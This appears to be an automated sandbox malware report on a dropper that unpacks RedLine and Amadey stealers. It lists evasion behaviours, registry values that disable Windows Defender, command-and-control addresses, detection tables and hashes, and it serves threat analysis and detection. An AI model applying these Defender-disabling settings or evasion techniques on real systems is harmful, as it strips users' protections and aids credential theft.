Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe TID: 5576	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe TID: 4360	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

6_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_1-2575
Source: C:\Users\user\Desktop\plEnknXWQD.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-2450
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_2-2450
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\plEnknXWQD.exe

Code function: 0_2_00385467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00385467

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Code function: 0_2_00382390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00382390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Code function: 1_2_01062390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_01062390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Code function: 2_2_00AC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	2_2_00AC2390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Code function: 3_2_002F2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_002F2390

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_0040CE09

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

6_2_004019F0

Source: C:\Users\user\Desktop\plEnknXWQD.exe

0_2_0038202A

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Code function: 6_2_0040ADB0 GetProcessHeap,HeapFree,

6_2_0040ADB0

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Code function: 6_2_02E17043 push dword ptr fs:[00000030h]

6_2_02E17043

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\plEnknXWQD.exe	Code function: 0_2_00386F40 SetUnhandledExceptionFilter,	0_2_00386F40
Source: C:\Users\user\Desktop\plEnknXWQD.exe	Code function: 0_2_00386CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00386CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Code function: 1_2_01066F40 SetUnhandledExceptionFilter,	1_2_01066F40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	Code function: 1_2_01066CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_01066CF0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Code function: 2_2_00AC6F40 SetUnhandledExceptionFilter,	2_2_00AC6F40
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	Code function: 2_2_00AC6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00AC6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Code function: 3_2_002F6F40 SetUnhandledExceptionFilter,	3_2_002F6F40
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	Code function: 3_2_002F6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_002F6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Code function: 6_2_004123F1 SetUnhandledExceptionFilter,	6_2_004123F1

Source: C:\Users\user\Desktop\plEnknXWQD.exe

Code function: 0_2_003818A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,

0_2_003818A3

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Code function: GetLocaleInfoA,

6_2_00417A20

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\plEnknXWQD.exe

Code function: 0_2_00387155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00387155

Source: C:\Users\user\Desktop\plEnknXWQD.exe

Code function: 0_2_00382BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

0_2_00382BFB

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe

Code function: 4_2_00007FF9A56C077D GetUserNameA,

4_2_00007FF9A56C077D

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1

Jump to behavior

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 6.2.ns5251Ks.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.ns5251Ks.exe.2c20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ns5251Ks.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.will6283.exe.4deee20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ns5251Ks.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.will6283.exe.4deee20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.3.plEnknXWQD.exe.49d9220.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.plEnknXWQD.exe.49d9220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.307182274.0000000004904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe, type: DROPPED

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 6.2.ns5251Ks.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.ns5251Ks.exe.2c20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ns5251Ks.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.will6283.exe.4deee20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ns5251Ks.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.will6283.exe.4deee20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 Windows Service	2 Bypass User Access Control	21 Disable or Modify Tools	1 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Windows Service	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Process Injection	22 Software Packing	NTDS	26 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	13 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Bypass User Access Control	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Access Token Manipulation	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Rundll32	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
plEnknXWQD.exe	67%	ReversingLabs	Win32.Trojan.Plugx
plEnknXWQD.exe	53%	Virustotal		Browse
plEnknXWQD.exe	100%	Avira	HEUR/AGEN.1252166
plEnknXWQD.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	100%	Avira	HEUR/AGEN.1252166
C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	100%	Avira	HEUR/AGEN.1252166
C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe	83%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe	84%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	70%	ReversingLabs	Win32.Trojan.Plugx
C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe	55%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe	76%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	64%	ReversingLabs	Win32.Trojan.Plugx
C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe	55%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe	46%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe	51%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe	64%	ReversingLabs	Win32.Trojan.Plugx
C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Casdet
C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe	46%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.will6283.exe.1060000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
0.0.plEnknXWQD.exe.380000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
3.3.will3971.exe.47f3c20.0.unpack	100%	Avira	HEUR/AGEN.1253311	Download File
2.3.will3629.exe.4a08820.0.unpack	100%	Avira	HEUR/AGEN.1253311	Download File
1.2.will6283.exe.1060000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
0.2.plEnknXWQD.exe.380000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://api.ip.sb/ip	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
62.204.41.87/joomla/index.php	0%	Avira URL Cloud	safe
62.204.41.87/joomla/index.php	13%	Virustotal		Browse
193.233.20.30:4125	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
62.204.41.87/joomla/index.php	true	13%, Virustotal, Browse Avira URL Cloud: safe	low
193.233.20.30:4125	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ip.sb/ip	will6283.exe, 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, qs5212ER.exe.1.dr	false	URL Reputation: safe URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	829681
Start date and time:	2023-03-18 21:01:50 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	plEnknXWQD.exe
Original Sample Name:	548ee02a30c2dcca5f3f91e90212ec29.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@15/10@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 65.1% (good quality ratio 62.4%) Quality average: 85% Quality standard deviation: 24%
HCA Information:	Successful, ratio: 94% Number of executed functions: 142 Number of non-executed functions: 146
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe	j8OyCuPzJD.exe	Get hash	malicious	Amadey, RedLine	Browse
	gGz6hXsQ5z.exe	Get hash	malicious	Amadey, RedLine	Browse
	ZXcrrc9u12.exe	Get hash	malicious	Amadey, RedLine	Browse
	2ZWTFBumFH.exe	Get hash	malicious	Amadey, RedLine	Browse
	QEjCVy6niV.exe	Get hash	malicious	Amadey, RedLine	Browse
	ad9ffe0b58f2.exe	Get hash	malicious	Amadey, RedLine	Browse
	setup.exe	Get hash	malicious	Amadey, RedLine	Browse
	setup.exe	Get hash	malicious	Amadey, RedLine	Browse
	tZ8P3TRdFa.exe	Get hash	malicious	Amadey, RedLine	Browse
	V28mWj6WVa.exe	Get hash	malicious	Amadey, RedLine	Browse
	Fzm8qTgKaa.exe	Get hash	malicious	Amadey, RedLine	Browse
	z5iTPC1sT2.exe	Get hash	malicious	Amadey, RedLine	Browse
	HkYl8K3mLN.exe	Get hash	malicious	Amadey, RedLine	Browse
	setup.exe	Get hash	malicious	Amadey, RedLine	Browse
	JlbJfLNR4d.exe	Get hash	malicious	Amadey, RHADAMANTHYS	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mx8896IL.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ns5251Ks.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.355221377978991
Encrypted:	false
SSDEEP:	6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
MD5:	03C5BA5FCE7124B503EA65EF522177C3
SHA1:	F76B1F538D5EA66664355901E927B2F870ACCDD8
SHA-256:	8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
SHA-512:	151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe

Download File

Process:	C:\Users\user\Desktop\plEnknXWQD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	241152
Entropy (8bit):	6.346560230971658
Encrypted:	false
SSDEEP:	6144:f36hrz456we4lz7zzZ5my2IuViMqJnyJQ:Pxpz7LmeuVi3nN
MD5:	5086DB99DE54FCA268169A1C6CF26122
SHA1:	003F768FFCC99BDA5CDA1FB966FDA8625A8FDC3E
SHA-256:	42873B0C5899F64B5F3205A4F3146210CC63152E529C69D6292B037844C81EC4
SHA-512:	90531B1B984B21CE62290B713FFC07917BBD766EEF7D5E6F4C1C68B2FC7D29495CDD5F05FD71FE5107F1614BBB30922DCFB730F50599E44AEAFF52C50F46B8B5
Malicious:	true
